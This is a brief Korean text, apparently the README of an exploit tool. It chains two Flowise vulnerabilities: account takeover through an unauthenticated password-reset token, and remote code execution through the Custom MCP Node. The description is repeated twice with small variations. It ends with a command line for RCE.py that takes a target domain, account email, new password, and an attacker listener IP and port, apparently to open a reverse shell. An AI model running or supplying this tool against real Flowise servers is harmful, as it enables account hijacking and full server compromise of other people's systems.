
CVE-2025-58434 Flowise <= 3.0.5 및 이전 버전에서 인증되지 않은 비밀번호 재설정 토큰을 통해 계정 탈취가 가능합니다. CVE-2025-59528 lowiseAI Custom MCP Node 원격 코드 실행.
CVE-2025-58434 Flowise <= 3.0.5 이하에서는 인증되지 않은 비밀번호 찾기 토큰을 통해 계정 탈취가 가능합니다. CVE-2025-59528 flowiseAI Custom MCP Node 원격 코드 실행.
python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>